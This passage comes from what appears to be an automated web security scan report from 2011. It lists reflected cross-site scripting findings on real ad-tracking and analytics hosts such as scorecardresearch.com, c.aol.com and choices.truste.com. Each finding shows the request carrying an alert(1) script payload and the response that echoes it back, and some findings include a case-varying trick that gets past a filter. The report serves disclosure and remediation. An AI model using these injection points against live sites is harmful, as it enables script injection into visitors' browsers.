.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8b174<script>alert(1)</script>253c92feb83", c16:"", r:""});



4.118. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bb21d<script>alert(1)</script>a519cc9619e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156bb21d<script>alert(1)</script>a519cc9619e&c3=5839988&c4=43836708&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:34:58 GMT
Date: Sat, 17 Sep 2011 16:34:58 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156bb21d<script>alert(1)</script>a519cc9619e", c3:"5839988", c4:"43836708", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});



4.119. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 98bb8<script>alert(1)</script>512a5964b9b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=583998898bb8<script>alert(1)</script>512a5964b9b&c4=43836708&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:34:59 GMT
Date: Sat, 17 Sep 2011 16:34:59 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"583998898bb8<script>alert(1)</script>512a5964b9b", c4:"43836708", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});



4.120. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload fcab9<script>alert(1)</script>d7ac84b85c6 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708fcab9<script>alert(1)</script>d7ac84b85c6&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:01 GMT
Date: Sat, 17 Sep 2011 16:35:01 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708fcab9<script>alert(1)</script>d7ac84b85c6", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});



4.121. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ad03d<script>alert(1)</script>3c8aa488771 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708&c5=70721135ad03d<script>alert(1)</script>3c8aa488771&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:02 GMT
Date: Sat, 17 Sep 2011 16:35:02 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135ad03d<script>alert(1)</script>3c8aa488771", c6:"", c10:"", c15:"", c16:"", r:""});



4.122. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9597a<script>alert(1)</script>f4456cf9540 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708&c5=70721135&c6=9597a<script>alert(1)</script>f4456cf9540& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:03 GMT
Date: Sat, 17 Sep 2011 16:35:03 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135", c6:"9597a<script>alert(1)</script>f4456cf9540", c10:"", c15:"", c16:"", r:""});



4.123. http://c.aol.com/read/_topic_stats [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/_topic_stats

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 522e9<script>alert(1)</script>70e589ec740 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/_topic_stats?ids=&links=http%3A%2F%2Fnai.glb.adtechus.com%2Fnai%2Fdaa.php7f0ce%2522-alert(document.location)-%2522a235be901d&blog_id=&dirty=true&callback=jsonp1316296586533522e9<script>alert(1)</script>70e589ec740 HTTP/1.1
Host: c.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:26 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Set-Cookie: gcp.dirty=true; Expires=Sat, 17-Sep-2011 17:42:26 GMT; Path=/
Content-Length: 203

jsonp1316296586533522e9<script>alert(1)</script>70e589ec740({
"status" : "OK",
"http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d" : {
"comments" : -1
}
});

4.124. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 3519d<script>alert(1)</script>6de3af1e98f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont33519d<script>alert(1)</script>6de3af1e98f&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:40:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5492
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ivName:"te-clr1-04c957cd-4db2-4ed6-9fbb-2fb88dc3baa8-itl",iconSpanId:"te-clr1-04c957cd-4db2-4ed6-9fbb-2fb88dc3baa8-icon",backgroundColor:"white",opacity:1,filterOpacity:100,containerId:"adconion01cont33519d<script>alert(1)</script>6de3af1e98f",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_04c957cd_4db2_4ed6_9fbb_2fb88dc3baa8_ib,interstitialWidth:480,interstitialHei
...[SNIP]...

4.125. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a&c=adconion01cont3&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:39:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5574
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a style="color:#456d88;text-decoration:none; display:inline; padding: 0; margin: 0;" href="http://preferences.truste.com/preference.html?affiliateId=40&pid=adexpose01&aid=adconion01&cid=0511adc728x90dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a&w=728&h=90" target="_blank">
...[SNIP]...

4.126. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload ecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont3&w=728&h=90&plc=trecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:41:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5492
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_960d0403_4ed5_48db_a460_bf6870783bbf_bi={baseName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf",anchName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-anch",width:728,height:90,ox:0,oy:0,plc:"trecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1",iplc:"rel",intDivName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-itl",iconSpanId:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-icon",backgroundColor:"white",opacity:1,filterOpacity:100,containerId
...[SNIP]...

4.127. http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37b9"><script>alert(1)</script>c19849ec573 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request